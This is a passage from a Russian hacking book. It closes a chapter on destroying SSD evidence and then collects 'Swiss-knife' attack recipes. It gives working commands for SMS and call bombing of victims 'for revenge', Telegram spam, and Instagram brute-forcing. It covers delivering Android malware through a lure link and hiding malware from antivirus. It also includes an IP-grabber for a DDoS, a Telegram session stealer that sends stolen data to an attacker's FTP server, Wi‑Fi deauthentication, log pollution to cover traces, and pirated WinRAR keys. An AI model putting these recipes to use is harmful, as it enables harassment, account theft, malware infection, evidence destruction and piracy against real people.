Если нужно быстро уничтожить информацию на SSD, то единственный правильный выход – физическое уничтожения микросхем SSD. Если же торжественное сожжение SSD в планы не входит, тогда нужно заранее отформатировать диск и ждать некоторое время (в надежде что времени хватит), пока контроллер очистит ячейки памяти.

Если речь идет о системном диске, то нужно иметь другой – чистый компьютер, на котором не будет ничего незаконного, к нему нужно будет подключить тот самый SSD, который нужно отформатировать и произвести форматирование. Система не позволит отформатировать системный диск, поэтому нужно или подключить его к другому компу или загрузиться с загрузочной флешки и произвести форматирование с нее. Подойдет любая установочная флешка/DVD с Windows – при установке системы можно выбрать форматирование диска, даже если он содержит информацию. Если ты опасаешься, что кто-то сможет добраться до твоих дисков во время твоего отсутствия, используй шифрование – подойдет, как BitLocker, так и VeraCrypt. В случае с BitLocker нужно позаботиться о сложном пароле и о надежном хранении ключа восстановления (либо сразу удали его – данные восстановить, если забыл пароль уже не сможешь, но может оно и к лучшему). В случае с VeraCrypt никаких ключей восстановления нет – если забыл пароль, то доступа к данным уже не получишь. Но пароль нужно использовать сложный, даже не смотря на возможность его забыть, иначе толку от шифрования не будет.

Примечание. Если есть время и ты не удаляешь инфу в спешке, запусти Autopsy, рассмотренный в главе 6. Посмотри, найдет ли инструмент какиелибо улики против тебя. Если найдет, то прими меры по их удалению. Если чувствуешь, что земля горит под ногами, не жалей железа, уничтожь его. Чем надежнее ты уничтожишь носители данных, тем меньше шансов у экспертизы будет найти улики против тебя!

## Глава 13.

## Швейцарский нож хакера

Все знают, что такое швейцарский нож и в чем его прелесть. Нужно чтото отрезать – пожалуйста, нужно открыть консервы – без проблем, нужны ножницы – нет вопросов. Эта глава – своеобразный швейцарский нож хакера. В ней собраны различные инструменты на все случаи жизни. Даже если тебе сейчас не пригодится тот или иной инструмент, рано или поздно ты все равно вернешься к этой главе. Все рассмотренные в этой главе программы ты без проблем найдешь в Интернете.

#### 13.1. Как восстановить пароль Total Commander

В 80-х и 90-х годах, когда компьютеры стали появляться у обычных пользователей (пусть не у самых обычных), а не у каких-то НИИ, основной операционной системой была DOS. Молодые читатели этой книги никогда не видели ее и, наверняка, увидят лишь на фотография, ибо скриншоты она не поддерживала. DOS визуально была похожа на UNIX/Linux без графического интерфейса – просто командная строка и все. Конечно, технически DOS отставала от UNIX колоссально - она была однопользовательской и однозадачной, в то время как UNIX с самого своего рождения была многопользовательской и многозадачной. Но сейчас речь не об этом. Во времена DOS и оболочки Windows 3.11 были популярные двухпанельные файловые менеджеры вроде Norton Commander, Volkov Commander, DOS Navigator и т.д. Такие менеджеры визуально были похожи друг на друга. Экран делился на две панели – левую и правую. Каждая из панелей отображала содержимое какого-то каталога или же могла отображать содержимое текстового файла, выделенного на второй панели. Двухпанельные файловые менеджеры настолько въелись в головы пользователей, что прошли годы, а они не потеряли свою актуальность. Естественно, они стали другими – это уже полноценные Windows-приложения, с функционалом, о котором во времена DOS можно было только мечтать, с поддержкой плагинов и т.д. Один из таких менеджеров – Total Commander.

Популярный файловый менеджер Total Commander хранит пароли к FTPсерверам в конфигурационном файле WCX\_FTP.INI, который хранится в том же каталоге, что и сам Total Commander. Как восстановить забытый пароль? Сделать это можно с помощью программы wcftpcrack. Использовать ее очень просто:

- 1. В любом текстовом редакторе открой файл WCX\_FTP.INI.
- 2. Скопируй зашифрованный пароль к FTP-серверу и вставь его в программу wcftpcrack.
- 3. Нажми кнопку Show и получи расшифрованный пароль.

P FTP Pass	- 🗆 ×
Password :	South Con
ABA2BFF28E49FEC8D2	Tange ()
Show I	States and
mdkTBYT9	
	A
	11.
	•

Рис. 13.1. Расшифровка пароля Total Commander

#### 13.2. Бесплатная отправка SMS по всему миру

Иногда нужно бесплатно и анонимно отправить SMS (цели у всех разные). Для этого ты можешь использовать сервис *https://freebulksmsonline.com/*, отправляющий SMS совершенно бесплатно. Просто введи номер получателя и текст сообщения (ограничен 480 символами).

🔆 🔅 🖞 🇿 🕯 Heetuksenssekse.com	
	Send SMS Worldwide
Couple Spitt Ma	<ul> <li>Send SHS, Bulk SHS (text messages) to any mobile phone in the world)</li> </ul>
ting all mainfails	• No registration required! Just write your message and send it.
	MMS Now Available. Send Multimedia Messages (MMS) Worldwide.
and the second second	Do you like our services? Recommend us to your friendst
	Enter phone number:
	★ * 8 (\$12) 345-47-89
	(redpient's phone number)
	Your message:
	Enter Teat
	the Mill of the second of the second of
	HHS Media (Optional - For NHS only): Choose picture or addio files (max file attre 4mb) Budisparte dollar) Paale win nuripair

Puc. 13.2. Cepsuc https://freebulksmsonline.com/

Если ты хочешь пошутить над кем-то или отомстить кому-то, используй инструмент TBomb (он будет рассмотрен далее в этой главе). TBomb позволяет заполнить телефон жертвы SMS или же порядком надоесть ей посредством различных звонков, поступающих на ее телефон. Да, он работает не во всех регионах и не со всеми операторами, но модуль SMS вполне себе неплохо работает по всему бывшему СНГ. Дерзай, и месть твоя будет страшна!

#### 13.3. Запутываем следы в логах сервера

Представь, что ты немного наследил и нет возможности убить логии, поскольку нет нужного доступа к логам. Если следы нельзя стереть, значит можно еще больше намусорить, чтобы их не было видно – это позволяет лучше запутать следы. Приложение **logspamer** – это утилита, которая заходит на список сайтов, прописанных в коде, тем самым засоряя логи. Так же утилита переходит по ссылкам, которые найдет на сайтах.

Данная утилита двойного действия. Кроме как запутать следы на сервере, где ты наследил, эта утилита позволяет наследить в логах твоего провайдера. Как мы знаем, что наши провайдеры сохраняют список сайтов, на которые мы заходили. Благодаря этой утилите мы можем захламить свои логи, где будет сложно разобраться, что произошло.

Для ее установки в любом Debian-образном Linux-дистрибутиве (Ubuntu, Kali) введи команды:

```
sudo apt update
sudo apt install git -y
sudo apt install python -y
sudo pip install requests
sudo git clone https://github.com/TermuxGuide/logspamer
sudo cd logspamer
sudo pip install -r requirements.txt
```

**Примечание.** Если команда *pip* у тебя не найдена, ее нужно сначала установить командой *sudo apt install pip*.

Запустим утилиту:

sudo python logspamer.py --config config.json

Логи будут очень сильно загажены, поэтому всегда можно сказать, что у тебя поселился вирус, который и заходил на те сайты (в том числе и на те, которые ты посещал сам).

## 13.4. Bopyem WinRAR

WinRAR – хороший активатор, но не всем хочется платить за него деньги. Попробуем его активировать бесплатно. Для этого нам не понадобится какой-то софт. Все делается с помощью текстового редактора.

Далее действуем так:

- 1. Создаем текстовый документ: правой кнопкой мыши щелкаем по рабочему столу, выбираем Создать, Текстовый документ.
- Открываем его, затем копируем данные без кавычек, которые мы приведем ниже. Есть два варианта данных, если первый не подойдет – пробуй второй.

Вариант 1:

```
"RAR registration data
Unlimited Company License
UID=47fcf0b72482e046a794
6412212250a794c8ab6d7dc6f1dd6c4bb1ce68f4915b89e47e0327
7c3e07a0533b0884eb0560fce6cb5ffde62890079861be57638717
7131ced835ed65cc743d9777f2ea71a8e32c7e593cf66794343565
b41bcf56929486b8bcdac33d50ecf773996014ac5ad5d3225b36f7
6baf4e30c86cf3088489f59c2754132d766936156c962c3f2068a7
da4b9ef35ee942ddb0b0175ceb28039cb16ca9a88be8ecb2608878
5ac7510eda31233a8f46ab52ecdb1b769dcc7da2be234006972154"
```

Вариант 2:

```
"RAR registration data

PROMSTROI GROUP

15 PC usage license

UID=42079a849eb3990521f3

641221225021f37c3fecc934136f31d889c3ca46ffcfd8441d3d58

9157709ba0f6ded3a528605030bb9d68eae7df5fedcd1c12e96626

705f33dd41af323a0652075c3cb429f7fc3974f55d1b60e9293e82

ed467e6e4f126e19cccccf98c3b9f98c4660341d700d11a5c1aa52

be9caf70ca9cee8199c54758f64acc9c27d3968d5e69ecb901b91d

538d079f9f1fd1a81d656627d962bf547c38ebbda774df21605c33

eccb9c18530ee0d147058f8b282a9ccfc31322fafcbb4251940582"
```

- 1. Сохраните один из вариантов данных в файл.
- 2. Имя файла должно быть rarreg.key.
- 3. Скопируйте файл в каталог, в который установлен WinRAR

4. Запусти WinRAR и проверь, активировался он или нет. Если нет, пробуй второй вариант данных.

#### 13.5. Приватная операционная система Kodachi

Ранее мы рассмотрели операционную систему Kali Linux, предназначенную не только для хакинга, но и для исследования всевозможных дыр в системе безопасности. В отличие от Kali Linux,

Kodachi позиционируется как anti-forensic-разработка, затрудняющая криминалистический анализ твоих накопителей и оперативной памяти. Технически это еще один форк Debian, ориентированный на приватность. В чем-то он даже более продуман, чем популярный Tails.

Среди ключевых особенностей **Kodachi** — принудительное туннелирование трафика через Tor и VPN, причем бесплатный VPN уже настроен.

Другое отличие Kodachi — интегрированный Multi Tor для быстрой смены выходных узлов с выбором определенной страны и PeerGuardian для сокрытия своего IP-адреса в P2P-сетях (а также блокировки сетевых узлов из длинного черного списка).

Операционная система плотно нафарширована средствами криптографии (TrueCrypt, VeraCrypt, KeePass, GnuPG, Enigmail, Seahorse, GNU Privacy Guard Assistant) и заметания следов (BleachBit, Nepomuk Cleaner, Nautiluswipe).

Ссылка для загрузки дистрибутива:

https://sourceforge.net/projects/linuxkodachi/

### 13.6. Плагин Privacy Possum для Firefox

**Privacy Possum** — один из самых известных плагинов для Firefox, предназначенных для борьбы со слежкой методом блокировки и фальсификации данных, которые собирают различные трекинговые скрипты.

**Privacy Possum** предотвращает прием файлов cookies, блокирует HTTPзаголовки set-cookie и referrer, а также искажает "отпечаток" браузера, что затрудняет фингерпринтинг.

Продвинутых настроек у плагина нет: его можно включить или выключить, а на страничке конфигурации — запретить автоматическое обновление и разрешить ему запускаться в приватном окне.

Проверить работоспособность и эффективность плагина можно следующими способами:

- Используем сервис Panopticlick (https://coveryourtracks.eff.org/) для проверки блокировки cookies и рекламных трекеров.
- Пользуемся сайтом Webkay (https://webkay.robinlinus.com/) для проверки различных утечек: IP, данные железа, версия ОС и самого браузера.

Если ты используешь Тог, данный плагин тебе не нужен. Но если тебе по некоторым причинам нельзя использовать Тог (или не нужно), тогда установи данный плагин, чтобы усложнить сбор сведений о себе.

# 13.7. Получаем конфиденциальную информацию о пользователе Facebook

FBI – это точный сбор информации об учетной записи facebook, вся конфиденциальная информация может быть собрана, даже если цель установит максимальную конфиденциальность в настройках аккаунта.

Для работы инструмента подойдет любой Debian-образный дистрибутив – Debian, Ubuntu, Kali Linux и т.д.

#### Установка:

```
apt update && apt upgrade
apt install git python2
git clone https://github.com/xHak9x/fbi.git
cd fbi
pip2 install -r requirements.txt python2 fbi.py
```

#### Использование:

```
help (справка, чтобы увидеть доступные команды)
token (войти с поддельным ID)
getinfo
```

Вставь любой идентификатор пользователя, тогда инструмент покажет тебе всю информацию об этом пользователе.

Ты можешь использовать **dumpid**, чтобы найти идентификатор или скопировать из ссылки профиля пользователя.



#### 13.8. Узнаем местонахождение пользователя gmail

В Google есть возможность оставить отзыв о заведениях, которые посещал пользователь. Зная всего лишь адрес электронной почты, хакеры могут определить примерное местонахождение пользователя.

Как это сделать?

- 1. Заходим на contacts.google.com и добавляем e-mail в контакты.
- 2. Открываем средства разработчика в браузере (комбинация клавиш Ctrl + Shift + I)
- 3. Наводим указатель мыши на меленькую фотографию контакта в левом нижнем углу и заходим в код элемента.
- 4. Находим строчку <div class="NVFbjd LAORIe" data-source id="115978902187173497207"> и копируем числовое значение – это GoogleID.
- 5. Вставляем его вместо <GoogleID> в ссылку https://www.google.com/maps/ contrib/<GoogleID> и переходим по ней.

Если человек когда-либо оставлял отзывы, ты увидишь, где и когда это было, и что он писал.

## 13.9. Обход авторизации Wi-Fi с гостевым доступом. Ломаем платный Wi-Fi в отеле

Нередко встречаются роутеры с "гостевым доступом", но бывает, что бесплатный Wi-Fi имеет защиту Captive Portal.

Другими словами, имеется открытая сеть Wi-Fi-сеть, к которой мы можем подключиться без использования пароля, но при каждой нашей попытке зайти на интернет-ресурс нас будут перенаправлять на страницу, где необходимо будет ввести учетные данные, оплатить, подтвердить номер телефона с помощью СМС или еще что-нибудь. Разумеется, ни оставлять свой номер телефона, ни тем более платить за доступ к Интернету не хочется.

Поэтому мы будем использовать утилиту, которая будет обходить данную защиту. Далее заходим в терминал и прописываем команды для установки:

```
sudo sudo apt -y install sipcalc nmap
wget https://raw.githubusercontent.com/systematicat/
hack-captive-portals/master/hack-captive.sh
sudo chmod u+x hack-captive.sh
sudo ./hack-captive.sh
```

Использование:

sudo ./hack-captive.sh

После фразы "Pwned! Now you can surf the Internet!" ты можешь пользоваться Интернетом совершенно бесплатно.

#### 13.10. Сайт для изменения голоса

Сайт https://voicechanger.io/ – не слишком серьезный инструмент, но зато довольно простой и функциональный. И при этом бесплатный. Для всевозможных шуток над своими друзьями его возможностей более чем достаточно.

Есть возможность загрузить готовое аудио/текст или записать все в режиме онлайн. Бонусом идут несколько десятков готовых пресетов, а также возможность создать свой собственный.

Ты с легкостью можешь использовать этот инструмент, если есть необходимость оставить какое-то анонимное послание в Интернете, чтобы тебя не могли вычислить по голосу. Главное, соблюдать анонимность при работе с самим сайтом – не нужно заходить на него со своего IP-адреса.

### 13.11. Спамим друга в Telegram с помощью Termux

Перед тем как установить и использовать приведенный далее скрипт, нам необходимо получить собственный идентификатор API и хеш. Не забывай, что эти данные ни в коем случае нельзя показывать или передавать другим!

Получить эти данные можно на сайте my.telegram.org (заходим в "Инструменты разработки", далее заполняем первые два поля, и нажимаем **Сохра**нить). Все, мы получили хеш и идентификатор. Осталось только разобраться, как их использовать.

Установим необходимые пакеты (в Debian/Ubuntu/Kali вместо sudo apt используй apt):

```
sudo sudo apt update && sudo apt upgrade
sudo sudo apt install git python
sudo pip install telethon pyotp
git clone https://github.com/SeRgEy2701/TG-spam
cd TG-spam
```

#### Запускаем:

python spamtg.py

После запуска мы заполняем поля:

- 1. Вводим свой хеш.
- 2. Вводим наш идентификатор (ір приложения).
- 3. Вводим количество сообщений.
- 4. Вводим ID жертвы.
- 5. Вводим текст сообщения.

Если все сделано успешно, то тебя попросят ввести номер телефона, который привязан к твоему аккаунту, и пришедший код. Готово!

## 13.12. Узнаем IP-адрес через Telegram

Телега скрывает IP-адреса пользователей. Попробуем вычислить IP-адрес другого пользователя Telegram. Никакой софт нам особо не нужен, только сам Telegram и Wireshark для анализа трафика. Ранее было показано, как использовать Wireshark. Далее приводим только действия, которые необходимо выполнить:

- 1. Запусти Wireshark и в фильтре обязательно указываем нужный нам протокол STUN.
- 2. Затем нажми на лупу (Найти пакет) и видим, как у тебя появится новая строка с параметрами и поисковой строкой. Там выбираем параметр **Строка**.
- 3. В строке пишем XDR-MAPPED-ADDRESS.
- 4. Включаем Wireshark и звоним через Telegram. Как только пользователь ответит на звонок, тут же у нас начнут отображаться данные ,и среди них будет IP-адрес юзера, которому звонили.
- 5. Чтобы понять, какой именно IP нам нужен, жмем уже в настроенном поисковике **Найти**, ищем в строке XDR-MAPPED-ADDRESS, а то, что идет после него и есть нужный нам IP.

Конечно, если пользователь использует прокси (тот же VPN), ты увидишь IP-адрес VPN-сервера. Но, по крайней мере, ты будешь знать, что пользователь не простой, а продвинутый!

### 13.13. Как убить Android-девайс врага

Показываем способ, позволяющий "убить" телефон недруга с помощью вируса. Все, что нужно от тебя, – установить скрипт и получить заветную

ссылку. Затем эту ссылку нужно отправить врагу и постараться заманить его на нее. Если он не откроет ссылку, то ничего не выйдет. Главное не открой эту ссылку сам!

Итак, сначала нужно установить скрипт:

```
sudo apt upgrade
sudo apt install python git
sudo pip install lolcat
git clone https://github.com/noob-hackers/Infect
cd Infect
bash infect.sh
```

После этого выбираем вариант 1 и жмем 3 раза Enter – для нас сразу же создастся ссылка. Ее нужно скопировать и кинуть жертве. Когда жертва перейдет по нужной нам ссылке, скачается файл System Update.apk. Далее все зависит, разрешена ли у жертвы установка приложений из непроверенных источников. Если да, то телефон жертвы начнет умирать медленно, но верно. Если же выключена, то ничего у тебя не получится, но попробовать нужно однозначно!

## 13.14. Шифруем вирус для Android

AVPASS – это инструмент для обхода модели обнаружения систем вредоносных программ Android (т.е. антивируса в Android) и обхода их логики обнаружения с помощью утечки информации в сочетании с методами обфускации APK.

AVPASS не ограничивается функциями обнаружения, используемыми системами обнаружения, а также может определять правила обнаружения, чтобы замаскировать любое вредоносное ПО для Android под безобидное приложение путем автоматического преобразования двоичного файла APK.

Инструмент предоставляет режим имитации, который позволяет разработчикам вредоносных программ безопасно запрашивать любопытные функции обнаружения без отправки всего двоичного файла.

AVPASS предлагает несколько полезных функций для преобразования любого вредоносного ПО для Android для обхода антивируса. Ниже приведены основные функции, которые предлагает AVPASS:

- Обфускация АРК с более чем 10 модулями.
- Вывод функций для системы обнаружения с помощью индивидуальной обфускации.

- Вывод правил системы обнаружения с использованием факторного эксперимента 2k.
- Целенаправленная обфускация для обхода конкретной системы обнаружения.
- Поддержка безопасных запросов с использованием режима имитации.

Посмотреть на инструмент в действии можно в следующих видео:

https://www.youtube.com/watch?v=6D1miTSRKA8 https://www.youtube.com/watch?v=GkMyobby188

Приступим к установке инструмента. Первым делом обновим пакеты:

sudo apt update -y

#### Клонируем репозитарий:

cd ~

```
git clone https://github.com/sslab-gatech/avpass
```

Переходим в каталог avpass и устанавливаем все необходимые зависимости:

```
chmod +x install-dep.sh
sudo ./install-dep.sh
```

Далее все зависит от того, что тебе нужно сделать. Смотри видео, читай документацию – она будет в каталоге avpass/docs. Конкретно команда шифрования файла будет выглядеть так:

```
python gen disguise.py -i <название АРК-файла> individual
```

Алгоритм таков:

- 1. Когда мы рассматривали инструменты Kali Linux, был инструмент "разборки" АРК-файла.
- 2. Скачай какой-то АРК-файл, распакуй его с помощью Apktool.
- 3. Добавь вирус в АРК.
- 4. Создай новый АРК.
- 5. Зашифруй его инструментом avpass.

## 13.15. Мстим недругу с помощью CallSpam

Если тебе кто-то насолил, можно отомстить ему, да еще и не своими руками. В этом тебе поможет CallSpam – небольшой скрипт, суть которого очень проста – он берет нужный тебе номер и помещает его во все сервисы, которые будут названивать и предлагать свои услуги.

Список команд для установки CallSpam в любом Debian-образом дистрибутиве:

```
apt update && apt upgrade -y
apt install python git -y
pip install requests
pip install transliterate
pip install colorama
git clone https://github.com/kitasS/callspam
cd callspam
python SpamCall.py
```

Примечание. Теоретически тебе даже Linux не нужен, можешь установить Adnroid-приложение Termux и сможешь вводить все эти команды прямо в своем смартфоне. В этом случае вместо apt используй команду pkg. Синтаксис будет такой же, просто замени apt на pkg.

Итак, первые две команды подготавливают твою систему. Первая обновляет пакеты/систему, вторая – устанавливает Python и Git. Если ты устанавливал эти приложения ранее, можешь первые две команды не вводить вообще.

Команды 3 – 5 устанавливают необходимые для Python-скрипта модули. Далее вызываем Git для клонирования репозитария callspam на локальный комп, переходим в папку callspam и запускам скрипт SpamCall.py. Обрати внимание, что название скрипта и репозитария отличаются.

Далее нужно ввести номер телефона и имя. Если имя не указано, при звонке будут указывать рандомные имена. После чего видим, с каких сервисов ему будут звонить.

### 13.16. Еще одна бомба-спаммер ТВоть

Если CallSpam тебе оказалось мало, TBomb – это новый инструмент, который будет надоедать вашей жертве не только спамом CMC, но и звонками в 7 часов утра вроде "вам одобрен займ". Единственный недостаток этого бомбера – звонки работают не во всех регионах и не со всеми операторами, но попытаться стоит.



Рис. 13.4. Установка дополнительного ПО завершена

#### Клонируем репозитарий:



Устанавливаем все зависимости (Python-модули):

python -m pip install -r requirements.txt bash TBomb.sh

При первом запуске TBomb установит все необходимые пакеты (рис. 13.3), дождитесь завершения процесса, пока не увидите строчку *Requirements Installed* (рис. 13.4).

Далее ты увидишь основное меню бомбера (рис. 13.5). Выбери режим спама:

- 1. SMS
- 2. Звонки
- 3. E-mail



Рис. 13.5. Основное меню бомбера

Выбери 1 или 2. Дальше нужно ввести код страны (без +) и номер телефона жертвы.

Далее жмем Enter 2 раза, вписываем "1" или "2" для выбора режима спама, вписываем код страны жертвы (например, "7" без +), а далее и сам номер телефона.

Затем вводим следующую информацию:

- Количество сообщений/звонков. Максимум 100, но если ввести 0, то количество будет неограниченно.
- Задержку между SMS/звонком.
- Количество потоков.



Рис. 13.6. Параметры бомбера

Затем ты увидишь параметры бомбера и сообщение о том, что бомбинг в любой момент можно приостановить, нажав Ctrl + Z, и продолжить, нажав **Enter**. Нажми **Enter** сейчас для начала процесса. На рис. 13.7 показано, что мы выбрали 2 потока, 60 секунд между SMS/звонком, 100 сообщений. Собственно, на этом все. Наслаждаемся процессом и смотрим, сколько SMS было отправлено (на рис. 13.7 показано, что отправлено 6 сообщений, из них 3 – успешно).



Рис. 13.7. Процесс бомбинга

#### 13.17. Взлом Instagram

С помощью скрипта Instahack ты можешь выполнить брутфорс Instagramаккаунта. Перед тем как начинать брутфорс аккаунта, не забудь анонимизироваться. Торифицируй трафик или подключись к VPN. Для установки Instahack выполни следующие действия:

1. Как обычно, обновим пакеты:

sudo apt update -y sudo apt upgrade -y

2. Еще нам нужен Python2 и Git:

```
sudo apt install python -y
sudo apt install python2 -y
sudo apt install git -y
```

3. Устанавливаем зависимости:

pip install lolcat

4. Качаем instahack и открываем директорию с ним:

```
git clone https://github.com/evildevill/instahack
cd instahack
```

5. Запускаем установщик и сам Instahack:

bash	setup	N- Kieker	and and			
bash	instahack.	sh	A PARA			and the set

#### 13.18. DDOS-атака роутера

При желании можно "задостить" роутер неприятеля, что оставит его на некоторое время без Интернета. Учитывая, что все в основном используют дешевенькие коробочки в среднем за 3-4 тысячи рублей, такой атаки роутер не выдержит. Это хорошая новость. Плохая заключается в том, что тебе нужно как-то выяснить IP-адрес неприятеля. Возможно, придется его заманить на свой сайт и посмотреть логи или же написать простейший скрипт, который будет отправлять тебе IP-адрес всякого пользователя, который на него зашел. На PHP такой скрипт будет выглядеть так:

<?php mail('твой email', 'IP-адрес', "IP: \$\_SERVER[REMOTE\_ADDR] "); ?>

Осталось только заманить жертву на этот скрипт, и ты получишь ее IP-адрес.

Далее действуй так:

nmap -T4 -v IP-адрес git clone https://github.com/Hydra7/Planetwork-DDOS

Пока **птар** будет сканировать жертву на наличие открытых портов, открой второй терминал и введи вторую команду – это установит скрипт для DDOSатаки.

При появляющихся диалоговых окнах "Do you want to continue? Y/n" нажимаем Y. Запуск:

```
cd Planetwork-DDOS
python2 phtddos.py IP-адрес открытый порт к-во пакетов
```

Пример:

```
python2 phtddos.py 111.11.11.11 80 5000
```

Аналогичным образом можно "положить" какой-то сайт, а не только роутер неприятеля. С сайтом одновременно и проще и сложнее. Проще, потому что не нужно заманивать жертву на свой скрипт – IP-адрес сайта легко вычислить, да и вообще можно указать сразу его доменное имя, не указывая IP-адрес. Сложнее в том, что сайт может работать через анти-DDOS-сервис вроде CloudFlare и у тебя ничего не выйдет. Атака будет отсекаться, а сайт продолжит работу.

#### 13.19. Sploitus – поисковик свежих уязвимостей

Рассмотренный ранее в этой книге Metasploit – не панацея и далеко не единственный инструмент для поиска уязвимостей. Да и уязвимости в нем не самые новые. Это объясняется тем, что в случае Metasploit процесс добавления уязвимости выглядит так:

- 1. Появление уязвимости когда она впервые обнаружена хакером.
- Спустя некоторое время уязвимость становится достоянием общественности – о ней узнают все, в том числе и разработчики программного продукта, в котором обнаружена уязвимость.
- 3. Разработчики Metasploit, после того, как об уязвимости становится известно всем, должны внести изменения во фреймворк и выпустить обновления. Это сложнее, чем просто выложить информацию об уязвимости на сайте, поэтому реализация пункта 3 займет некоторое время.
- 4. Конечный пользователь Metasploit должен обновить фреймворк, чтобы появилась возможность использовать уязвимость.

Сайт https://sploitus.com/ – это своеобразный поисковик уязвимостей. На нем даже выкладываются уязвимости недели – самые новые уязвимости, которые ты можешь попробовать прямо сейчас.

На рис. 13.9 показано, как выглядит типичная уязвимость. Конкретно – уязвимость в популярном движке для е-коммерции OpenCart. Можешь взломать чей-то интернет-магазин прямо сейчас!

Конечно, здесь ты не сможешь взломать чью-то систему посредством ввода строго определенного набора команд. Здесь нужны знания – понимания основ работы веб-приложения (если речь идет об OpenCart), понимание HTML и PHP. Если рассматривать конкретную уязвимость, представленную на рис. 12.9, то там все просто – достаточно создать HTML-файл с указанным содержимым и заменить некоторые значения формы своими. Инструкции также предельно просты (если не понимаешь, используй Google Chrome в качестве переводчика сайтов), но, повторимся, это только в случае с этой уязвимостью.



Рис. 13.9. Описание уязвимости

### 13.20. Угон Telegram-аккаунта

В этом, заключительном, разделе мы рассмотрим, как "угнать" интересующий Telegram-аккаунт. Необходимый скрипт Telegram\_Stealer можно найти в Интернете, с его помощью ты сможешь завладеть Telegram-аккаунтом жертвы.

Далее все действия будут производиться в Windows:

- 1. Распакуй архив Telegram\_Stealer.zip на своем компьютере.
- 2. Установи Python 3.8.2 или новее.

- 3. Установи любой редактор кода подойдет или Sublime Text 3 или Visual Studio Code, в крайнем случае хватит и Notepad2.
- 4. Зарегистрируйся на любом FTP-сервере, в крайнем случае можно развернуть свой FTP-сервер на своем компьютере, но этим ты засветишь свой IP-адрес, чего нельзя делать.
- 5. Открой файл скрипта в редакторе кода и укажите в нем свои данные для доступа к FTP имя сервера, имя пользователя, пароль. Сюда будет приходить вся информация от украденного Telegram-аккаунта.
- 6. Откомпилируй код Python-скрипта в ехе-файл. Для этого ты можешь использовать auto-py-to-exe.
- 7. Отправь получившийся exe-файл жертве. Когда она откроет этот файл, на FTP-сервере в твоем аккаунте появятся два zip-файла.
- 8. Скачайте Telegram Portable и откройте его. В Telegram появится папка "tdata" открой ее. У тебя будет папка "D877F783D5D3EF8C" открой ее и замени map0 или map1 (ты должен использовать свой файл с сервера tdata.zip).
- 9. Открываем снова "tdata" находим файл "D877F783D5D3EF8C", удаляем его. Переносим аналогичный файл с вашего tdata1.zip или tdata2.zip.
- 10.Запускаем Telegram Portable у нас на руках будет украденная сессия.

Самый сложный момент во всей этой истории – заставить жертву открыть ехе-файл и молиться, чтобы антивирус его не заблокировал – здесь все зависит от антивируса, знает ли он об этой уязвимости в Telegram или нет.

#### 13.21. Как положить Wi-Fi соседа или конкурента

Если ты не читал главу 10 или читал ее невнимательно, то поведаем, что с помощью инструментов для взлома Wi-Fi можно легко положить саму Wi-Fi-сеть, заставив всех ее клиентов отключиться.

Итак, открой терминал Kali Linux и выполни следующие команды:

```
airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng --deauth 100 -a BSSID wlan0mon
airmon-ng stop wlan0mon
```

Вкратце разберемся, что и к чему (подробности описаны в главе 10):

- Первая команда переводит сетевой интерфейс wlan0 в режим мониторинга. Если у тебя несколько беспроводных интерфейсов и ты хочешь использовать не wlan0, а какой-то другой, то имя интерфейса нужно сменить. Но обычно у всех один беспроводной интерфейс, поэтому данная команда останется неизменной.
- После ввода первой команды интерфейс будет переименован в wlan0mon. Когда твой адаптер находится в режиме мониторинга, введи вторую команду и вычисли BSSID сети, которую тебе нужно "убить". По сути, это MAC-адрес роутера. Но если свой MAC-адрес ты еще знаешь, то MACадрес врага еще нужно раздобыть.
- Третья команда выбрасывает из сети максимум 100 пользователей. Параметр – а задает BSSID сети – его ты узнал на предыдущем этапе. Опятьтаки, если интерфейс у тебя другой, то измени его имя.
- Когда наиграешься и тебе надоест, переведи свой адаптер в обычный режим четвертой командой.

#### \* \* \* Вместо заключения \* \* \*

В этой книге было рассмотрено достаточное количество всевозможных готовых и не очень рецептов по взлому различных систем. Если ты действительно хочешь стать профессиональным хакером, а не выскочкой, нахватавшимся верхов, тебе нужно понимание того, как работают информационные системы. Далее будет указан список направлений, в которых желательно совершенствоваться, иначе ты никогда не станешь профессионалом:

- Понимание работы сети и сетевого оборудования. Раздобудь где-то старенькую книгу вроде "Networking Essentials" или "Компьютерные сети. Учебник". В новых книгах наблюдается тенденция к поверхностному изложению материала, потому что все якобы просто. Воткнул роутер в розетку и он уже работает "из коробки", поскольку даже SSID настроен и указан с обратной стороны роутера вместе с паролем доступа. А как все работает – не указано. В упомянутых книгах рассматриваются не очень современные сетевые технологии, но зато рассматриваются основы передачи данных по сети и очень подробно. А основные принципы передачи данных по сети не изменились и для новых технологий, изменился лишь способ передачи данных и технические характеристики вроде скорости.
- Понимание принципов работы сетевых протоколов, а именно ты должен досконально понимать, как работают протоколы ТСР и IP. Ознакомься не только с версией v4, но и с версией v6, которая набрала обороты в последнее время.

- Во время взлома всевозможных систем в этой главе мы очень часто использовали Linux, поэтому ты должен выучить эту операционную систему от и до. К счастью, этой операционке посвящено очень много книг, в том числе и на русском языке.
- Выучи несколько языков программирования. Как минимум, нужно разбираться в Python и PHP. Много скриптов, как ты уже успел убедиться, написано на Python. А что касается PHP, то много приложений написано на этом языке программирования и без понимания основ PHP тебе вряд ли удасться взломать веб-приложение, написанное на этом языке.
- Выучи язык командной оболочки bash.
- Для взлома сайтов с использованием SQL-инъекций тебе нужно выучить язык запросов SQL. Без этого ты не сможешь взломать сайт, поскольку не поймешь, какие SQL-операторы нужно передать базе данных взломанного сайта.
- Неплохо будет разбираться и в Windows/Windows Server на уровне администратора. Нужно понимать систему, которую ты собрался взламывать.
   Это поможет и для взлома, и для защиты никогда не поздно переквалифицироваться из хакера в специалиста по IT-безопасности.

#### Список использованных источников информации:

https://kali.tools https://bit.ly/3n9lgCV https://www.techk47.com/free-email-services-without-phone-verification/ https://wickr.com/privacy https://bit.ly/2JMyKpx https://www.securitylab.ru/software/423908.php https://www.autopsy.com http://www.fastandeasyhacking.com/manual https://github.com/ramsey/uuid https://www.forensicfocus.com/articles/how-to-decrypt-bitlocker-volumes-with-passware/ http://www.elcomsoft.ru/ https://www.routerpasswords.com http://www.cherubicsoft.com/en/projects/usboblivion https://autohotkey.com/ https://sploitus.com/ https://freebulksmsonline.com https://sourceforge.net/projects/linuxkodachi https://www.flaticon.com/ru/free-icon/hacker\_3813200?term=%D1%85%D0%B0%D0%BA%D0%B5%D1%8 0&page=1&position=15&origin=tag&related\_id=3813200

Ярошенко А. А.

## ХАКИНГ НА ПРИМЕРАХ

#### Уязвимости, взлом, защита

2-е издание (исправ. и допол.)

#### Группа подготовки издания:

Зав. редакцией компьютерной литературы: М. В. Финков Редактор: Е. В. Финков Корректор: А. В. Громова

12+

